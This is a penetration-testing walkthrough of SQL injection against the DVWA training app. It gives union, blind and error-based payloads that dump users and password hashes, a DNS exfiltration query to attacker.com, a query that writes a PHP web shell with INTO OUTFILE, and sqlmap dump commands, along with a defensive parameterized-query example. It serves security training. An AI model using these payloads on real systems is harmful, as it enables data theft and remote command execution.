Penetration Testing with OWASP Top 10 - 2017 A1 Injection
SQL Injection on MySQL
Blind SQL Injection
6' or '1'='1
Error-based SQL Injection
1'
Union-based SQL Injection
Find the number of columns associated with the query
1' order by 1,2--
1' order by 3--
Based on the error message above (ORDER BY 1,2 succeeds while ORDER BY 3 fails), we can conclude that the query is associated with only two columns.
Next, we can try to obtain information using the UNION keyword.
Extract Information
1' union select group_concat(version(), ' ', database(), ' ', user(), ' ', @@datadir, ' ', @@hostname),2--
Extract More Information
Extract Table Name
1' union select group_concat(table_name),database() from information_schema.tables where table_schema = 'dvwa'--
Another Place to Extract Table Name
Extract Column Name
1' union select group_concat(column_name),2 from information_schema.columns where table_name='users'--
To retrieve tables from all databases
1' union select table_schema, GROUP_CONCAT(DISTINCT table_name SEPARATOR ', ') FROM information_schema.columns GROUP BY table_schema--
To retrieve columns from the selected database
1' union select table_name, GROUP_CONCAT(DISTINCT column_name SEPARATOR ', ') FROM information_schema.columns WHERE table_schema = 'dvwa' GROUP BY table_name--
1' union select table_name, GROUP_CONCAT(DISTINCT column_name SEPARATOR ', ') FROM information_schema.columns WHERE table_schema = 0x64767761 GROUP BY table_name--
Dump Data From Extracted Table and Column Names
1' union select user, password from users--
"Decrypt" MD5 Value Obtained
Insufficiency of the mysqli_real_escape_string() method
1 or 1=1
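The payload above works because escaping only neutralises quote characters: when the escaped value is concatenated into an unquoted numeric comparison, there is nothing to escape and the boolean lands in the query. The following is an added example (not DVWA's code) that reproduces the effect with an in-memory SQLite stand-in for the users table and a quote-doubling escape() in place of mysqli_real_escape_string(), then shows the parameterized query that closes the hole.

```python
import sqlite3

# Constructed stand-in for the DVWA "users" table (assumed schema, placeholder hashes).
def make_db():
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE users(user_id INTEGER PRIMARY KEY, first_name TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin',   'md5-placeholder-1'),
                                 (2, 'gordonb', 'md5-placeholder-2'),
                                 (3, 'pablo',   'md5-placeholder-3');
    """)
    return con

def escape(value):
    # Stand-in for mysqli_real_escape_string(): neutralises quote characters only.
    # SQLite doubles quotes where MySQL backslash-escapes them; the effect is the same.
    return value.replace("'", "''")

def lookup_quoted_escaped(con, user_input):
    # Escaped AND quoted: the quote-based payloads on this page become inert string literals.
    sql = "SELECT first_name FROM users WHERE user_id = '%s'" % escape(user_input)
    return [row[0] for row in con.execute(sql)]

def lookup_unquoted_escaped(con, user_input):
    # Escaped but NOT quoted: "1 or 1=1" contains no quotes, so escaping changes nothing
    # and the OR clause is parsed as SQL, returning every row.
    sql = "SELECT first_name FROM users WHERE user_id = %s" % escape(user_input)
    return [row[0] for row in con.execute(sql)]

def lookup_parameterized(con, user_input):
    # Prepared statement: the driver binds the value as data; it is never parsed as SQL.
    # (A real handler should also cast the id to int and reject anything else.)
    sql = "SELECT first_name FROM users WHERE user_id = ?"
    return [row[0] for row in con.execute(sql, (user_input,))]

if __name__ == "__main__":
    con = make_db()
    print(lookup_quoted_escaped(con, "6' or '1'='1"))     # []  escaping works here
    print(lookup_unquoted_escaped(con, "1 or 1=1"))       # ['admin', 'gordonb', 'pablo']
    print(lookup_parameterized(con, "1 or 1=1"))          # []  binding works everywhere
```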
Exploitation: File inclusion using load_file() function
1' union select load_file("C:\\xampp\\htdocs\\dvwa\\login.php"),null--
Exploitation: Data Exfiltration with DNS using load_file() function
SELECT LOAD_FILE(CONCAT('\\\\', (SELECT password FROM mysql.user WHERE user='root' LIMIT 1),'.attacker.com\\foobar'));
Exploitation: Create file using OUTFILE function
show variables like 'datadir';
select "<?php system($_GET['cmd']); ?>" INTO OUTFILE "../../htdocs/cmd.php";
Automated SQLi using SQLMap
sqlmap -u "http://192.168.66.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=ipp0lndfsu08f2ucl0tifm9v25" --dbs
Parameter id is injectable
Databases
sqlmap -u "http://192.168.66.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=ipp0lndfsu08f2ucl0tifm9v25" --tables -D dvwa
Tables from database dvwa
sqlmap -u "http://192.168.66.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=ipp0lndfsu08f2ucl0tifm9v25" --columns -D dvwa -T users
Columns from table users
sqlmap -u "http://192.168.66.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=ipp0lndfsu08f2ucl0tifm9v25" --dump -D dvwa -T users
Data dump with cracked passwords
How does SQLMap work?
By default, SQLMap keeps sending requests to the target server with the User-Agent "sqlmap", which makes its traffic easy to recognise in web server logs.
Study and Decode URL in Wireshark
Database
SELECT NULL,CONCAT(0x71706b6a71,IFNULL(CAST(schema_name AS CHAR),0x20),0x716b626b71) FROM INFORMATION_SCHEMA.SCHEMATA
Table
SELECT NULL,CONCAT(0x71706b6a71,IFNULL(CAST(table_name AS CHAR),0x20),0x716b626b71) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x64767761)
Data Dump
SELECT CONCAT(0x7162787871,IFNULL(CAST(`user` AS CHAR),0x20),0x7a6264797275,IFNULL(CAST(avatar AS CHAR),0x20),0x7a6264797275,IFNULL(CAST(failed_login AS CHAR),0x20),0x7a6264797275,IFNULL(CAST(first_name AS CHAR),0x20),0x7a6264797275,IFNULL(CAST(last_login AS CHAR),0x20),0x7a6264797275,IFNULL(CAST(last_name AS CHAR),0x20),0x7a6264797275,IFNULL(CAST(password AS CHAR),0x20),0x7a6264797275,IFNULL(CAST(user_id AS CHAR),0x20),0x7176707171),NULL FROM dvwa.users